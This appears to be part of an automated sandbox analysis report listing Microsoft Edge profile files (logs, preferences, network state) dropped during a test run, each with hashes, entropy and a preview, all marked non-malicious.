SHA-256:	1212F6D659E8499701698145A5B466125A21139FD6F2BD22D13A145832249AA1
SHA-512:	0C211C44E2783040010313A13FC937B9D14B739AABD983E3BA4496C3661E8DAF48BF52985D19A179248C4D13397F94770D371D9D08EFB93389EF8D08CC867D1E
Malicious:	false
Preview:	2024/09/01-00:28:31.596 2210 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/09/01-00:28:31.634 2210 Recovering log #3.2024/09/01-00:28:31.643 2210 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2490c4d1-fd92-4ea8-adc6-3cda094f5c4b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7a370736-5454-4cae-982f-19103c1c6af6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.926136109079379
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5:	4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1:	81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256:	E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512:	78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3a7e9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a7157af6-1762-455d-bd83-512c6a29e5c8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	61
Entropy (8bit):	3.926136109079379
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5:	4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1:	81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256:	E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512:	78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7818
Entropy (8bit):	5.09177603887916
Encrypted:	false
SSDEEP:	192:stU0s0x8CZihnkasY8bV+FiA66WbfaFIMYqWbLMJ:stU0s0x8xhObGix6WbfaTYqd
MD5:	E4A45BD0DE77E871151B1CE9F1C12A76
SHA1:	A4E4B9253BF5E4CBF7131F131F16D424ECFEE74E
SHA-256:	32742A8239CAC9CB9228B34A78B21998A79CE6F8EF89C26287BDB8F7059123F0
SHA-512:	E0F3C0CA8F279E13CFBEC17CE04EEFC376457CB514CAE1FE5F707FFF4CBB39F0065719BE9305631DBFFBD1110641EF8D411047871B958D392F355569DB846670
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638510870078","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13369638510797344"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c46a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7818
Entropy (8bit):	5.09177603887916
Encrypted:	false
SSDEEP:	192:stU0s0x8CZihnkasY8bV+FiA66WbfaFIMYqWbLMJ:stU0s0x8xhObGix6WbfaTYqd
MD5:	E4A45BD0DE77E871151B1CE9F1C12A76
SHA1:	A4E4B9253BF5E4CBF7131F131F16D424ECFEE74E
SHA-256:	32742A8239CAC9CB9228B34A78B21998A79CE6F8EF89C26287BDB8F7059123F0
SHA-512:	E0F3C0CA8F279E13CFBEC17CE04EEFC376457CB514CAE1FE5F707FFF4CBB39F0065719BE9305631DBFFBD1110641EF8D411047871B958D392F355569DB846670
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638510870078","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13369638510797344"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24691
Entropy (8bit):	5.568495917391831
Encrypted:	false
SSDEEP:	768:HEkMc3WPx8fKZ8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPO+w3rwPNVPfpxtuq:HEkMc3WPx8fKZu1jaCbwkFptJ
MD5:	5F043BBACBF35A57D3E8582298435A92
SHA1:	BC2CADAC7E598E0C479EE00FC303F02F54E55B5A
SHA-256:	A8918242BB241AA80EEC528CCD46E5F650D4D615B8D0A3130C337DD4045701DB
SHA-512:	6F51EA5E7060F39F491CC5FEFADED7948A84DF159EA5D04CAD56398497F0265CB11F8EEF762E87E782E368DF85FB69F3363439F86BE9EC8A69DE815BB0ABCE0A
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13369638510684788","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13369638510684788","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.119613782248967
Encrypted:	false
SSDEEP:	6:PIm9+q2P923oH+TcwtrQMxIFUt82If3JZmw+2IZdN9VkwO923oH+TcwtrQMFLJ:PIFv4YebCFUt82IR/+2IZdF5LYebtJ
MD5:	9C5DA2910224FA801CC96651DA7B88D6
SHA1:	4206098C1D84B5A439178B9CDC2C3D031F291D42
SHA-256:	BFA5D16FECCCE8A5D35265DFA808F87F161652351895E321F343D90CFAD63BF1
SHA-512:	4748F1F9EBB11428A7A71EA9EC302F35A2E1BF3263EF8E17E7C7E366DBAAD8F861737A4E92A54771FCB2F47266885F812A72AD04E0C8D1CD8FA95881803F824B
Malicious:	false
Preview:	2024/09/01-00:28:31.524 21e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/09/01-00:28:31.527 21e8 Recovering log #3.2024/09/01-00:28:31.536 21e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.119613782248967
Encrypted:	false
SSDEEP:	6:PIm9+q2P923oH+TcwtrQMxIFUt82If3JZmw+2IZdN9VkwO923oH+TcwtrQMFLJ:PIFv4YebCFUt82IR/+2IZdF5LYebtJ
MD5:	9C5DA2910224FA801CC96651DA7B88D6
SHA1:	4206098C1D84B5A439178B9CDC2C3D031F291D42
SHA-256:	BFA5D16FECCCE8A5D35265DFA808F87F161652351895E321F343D90CFAD63BF1
SHA-512:	4748F1F9EBB11428A7A71EA9EC302F35A2E1BF3263EF8E17E7C7E366DBAAD8F861737A4E92A54771FCB2F47266885F812A72AD04E0C8D1CD8FA95881803F824B
Malicious:	false
Preview:	2024/09/01-00:28:31.524 21e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/09/01-00:28:31.527 21e8 Recovering log #3.2024/09/01-00:28:31.536 21e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.100086506207927
Encrypted:	false
SSDEEP:	6:PIMpi+i+q2P923oH+Tcwt7Uh2ghZIFUt82IMpi+mZmw+2IMpi+iVkwO923oH+Tcz:PIMK+v4YebIhHh2FUt82IMO/+2IMKV5g
MD5:	B9CA1EAAF51FD480154DAA0835FAC863
SHA1:	09EA87A7E21ACBDAAC17CCB20344A965F338FE5A
SHA-256:	B4667CE8014AF3BA519D9A55ADF8E75D35FB5D4922287CF5063344185F04B616
SHA-512:	B1B72CCA6D9BC43E194D1A869003A4C0E2A7A0F9CDE679164EB1CCC298C35EB5A38F6E6405599875E3F0462177AA4EA609AE6C837E6BDCC91486F5C70F76D403
Malicious:	false
Preview:	2024/09/01-00:28:30.845 212c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/09/01-00:28:30.845 212c Recovering log #3.2024/09/01-00:28:30.845 212c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.100086506207927
Encrypted:	false
SSDEEP:	6:PIMpi+i+q2P923oH+Tcwt7Uh2ghZIFUt82IMpi+mZmw+2IMpi+iVkwO923oH+Tcz:PIMK+v4YebIhHh2FUt82IMO/+2IMKV5g
MD5:	B9CA1EAAF51FD480154DAA0835FAC863
SHA1:	09EA87A7E21ACBDAAC17CCB20344A965F338FE5A
SHA-256:	B4667CE8014AF3BA519D9A55ADF8E75D35FB5D4922287CF5063344185F04B616
SHA-512:	B1B72CCA6D9BC43E194D1A869003A4C0E2A7A0F9CDE679164EB1CCC298C35EB5A38F6E6405599875E3F0462177AA4EA609AE6C837E6BDCC91486F5C70F76D403
Malicious:	false
Preview:	2024/09/01-00:28:30.845 212c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/09/01-00:28:30.845 212c Recovering log #3.2024/09/01-00:28:30.845 212c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old~RF3c380.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.100086506207927
Encrypted:	false
SSDEEP:	6:PIMpi+i+q2P923oH+Tcwt7Uh2ghZIFUt82IMpi+mZmw+2IMpi+iVkwO923oH+Tcz:PIMK+v4YebIhHh2FUt82IMO/+2IMKV5g
MD5:	B9CA1EAAF51FD480154DAA0835FAC863
SHA1:	09EA87A7E21ACBDAAC17CCB20344A965F338FE5A
SHA-256:	B4667CE8014AF3BA519D9A55ADF8E75D35FB5D4922287CF5063344185F04B616
SHA-512:	B1B72CCA6D9BC43E194D1A869003A4C0E2A7A0F9CDE679164EB1CCC298C35EB5A38F6E6405599875E3F0462177AA4EA609AE6C837E6BDCC91486F5C70F76D403
Malicious:	false
Preview:	2024/09/01-00:28:30.845 212c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/09/01-00:28:30.845 212c Recovering log #3.2024/09/01-00:28:30.845 212c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.221650586687396
Encrypted:	false
SSDEEP:	12:PIyHIv4YebvqBQFUt82IsFZ/+2I3AT5LYebvqBvJ:Ab4YebvZg8hkO3+LYebvk
MD5:	5A26448986AF2E6A5FECC8214DC3DCBD
SHA1:	A93F62BFB7389CA1134A11BE99541ED35A158678
SHA-256:	47B9BCB585B6FD171CBD3D15336F8D46AB5F4AE261E9026C3F38052AF9623E64
SHA-512:	42E6507CF3A4369E09AD78735DFB0FBFB9B46A22C43379459FAFF5B9A8948A9CEC8F2C4E9EBB2BF01A760B1E53CF52F4950DDB3B5DDB16EA9D5A4E07DCEF035B
Malicious:	false
Preview:	2024/09/01-00:28:31.650 21e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/09/01-00:28:31.652 21e8 Recovering log #3.2024/09/01-00:28:31.656 21e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.221650586687396
Encrypted:	false
SSDEEP:	12:PIyHIv4YebvqBQFUt82IsFZ/+2I3AT5LYebvqBvJ:Ab4YebvZg8hkO3+LYebvk
MD5:	5A26448986AF2E6A5FECC8214DC3DCBD
SHA1:	A93F62BFB7389CA1134A11BE99541ED35A158678
SHA-256:	47B9BCB585B6FD171CBD3D15336F8D46AB5F4AE261E9026C3F38052AF9623E64
SHA-512:	42E6507CF3A4369E09AD78735DFB0FBFB9B46A22C43379459FAFF5B9A8948A9CEC8F2C4E9EBB2BF01A760B1E53CF52F4950DDB3B5DDB16EA9D5A4E07DCEF035B
Malicious:	false
Preview:	2024/09/01-00:28:31.650 21e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/09/01-00:28:31.652 21e8 Recovering log #3.2024/09/01-00:28:31.656 21e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5d417843-4e37-47e0-a898-4d8d5b7b5928.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.926136109079379
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5:	4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1:	81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256:	E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512:	78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.926136109079379
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5:	4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1:	81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256:	E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512:	78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f64b8717-5668-4ff7-a527-cef5f6fe9896.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.193997920177819
Encrypted:	false
SSDEEP:	12:PI8Vv4YebvqBZFUt82I3xg/+2IUDI5LYebvqBaJ:Au4Yebvyg8hBUGLYebvL
MD5:	D4A0C64A47828D205809D33DD81ABDA6
SHA1:	905F62F2B6BCB183B040C031A13F5FD520B04F9F
SHA-256:	D8177746AE110CBFD5AFF303213177E46313831D740B24718CAC8DDBDC759A76
SHA-512:	DAD4B7E931B8E4A19BFEEC96F203E3B24D32FEE866B17462CE762176F904B43C5EF87CD505EFC2BB8EC2BCAA50E9F9F5826EBEF167FA11BD1D2E22384CFFF779
Malicious:	false
Preview:	2024/09/01-00:28:31.638 20e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/09/01-00:28:31.644 20e0 Recovering log #3.2024/09/01-00:28:31.647 20e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.193997920177819
Encrypted:	false
SSDEEP:	12:PI8Vv4YebvqBZFUt82I3xg/+2IUDI5LYebvqBaJ:Au4Yebvyg8hBUGLYebvL
MD5:	D4A0C64A47828D205809D33DD81ABDA6
SHA1:	905F62F2B6BCB183B040C031A13F5FD520B04F9F
SHA-256:	D8177746AE110CBFD5AFF303213177E46313831D740B24718CAC8DDBDC759A76
SHA-512:	DAD4B7E931B8E4A19BFEEC96F203E3B24D32FEE866B17462CE762176F904B43C5EF87CD505EFC2BB8EC2BCAA50E9F9F5826EBEF167FA11BD1D2E22384CFFF779
Malicious:	false
Preview:	2024/09/01-00:28:31.638 20e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/09/01-00:28:31.644 20e0 Recovering log #3.2024/09/01-00:28:31.647 20e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.129094675867384
Encrypted:	false
SSDEEP:	6:PIMrXzM+q2P923oH+TcwtpIFUt82IMoKZmw+2IMoVMVkwO923oH+Tcwta/WLJ:PIMrQ+v4YebmFUt82IMH/+2IMnV5LYev
MD5:	09F75DA6826BB49AC2DCFE4D48B753B7
SHA1:	393CD419176B0B5F9C9F5BE2A95BC5EBB5A9D567
SHA-256:	512FDD4F3C3ED64F32AF4B263FEF30A46B30E0F31BD166801512CFFDDF5B0BB9
SHA-512:	6B12B02821AC0B090FA4ABFA3CFF9998C08BA1FD08C1CD3FC33D88EADDAB971B0CB32432779E1E77EC3B4B050D15546ED2984E5A78FB0498EC173753A13CD11B
Malicious:	false
Preview:	2024/09/01-00:28:30.710 211c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/09/01-00:28:30.711 211c Recovering log #3.2024/09/01-00:28:30.711 211c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.129094675867384
Encrypted:	false
SSDEEP:	6:PIMrXzM+q2P923oH+TcwtpIFUt82IMoKZmw+2IMoVMVkwO923oH+Tcwta/WLJ:PIMrQ+v4YebmFUt82IMH/+2IMnV5LYev
MD5:	09F75DA6826BB49AC2DCFE4D48B753B7
SHA1:	393CD419176B0B5F9C9F5BE2A95BC5EBB5A9D567
SHA-256:	512FDD4F3C3ED64F32AF4B263FEF30A46B30E0F31BD166801512CFFDDF5B0BB9
SHA-512:	6B12B02821AC0B090FA4ABFA3CFF9998C08BA1FD08C1CD3FC33D88EADDAB971B0CB32432779E1E77EC3B4B050D15546ED2984E5A78FB0498EC173753A13CD11B
Malicious:	false
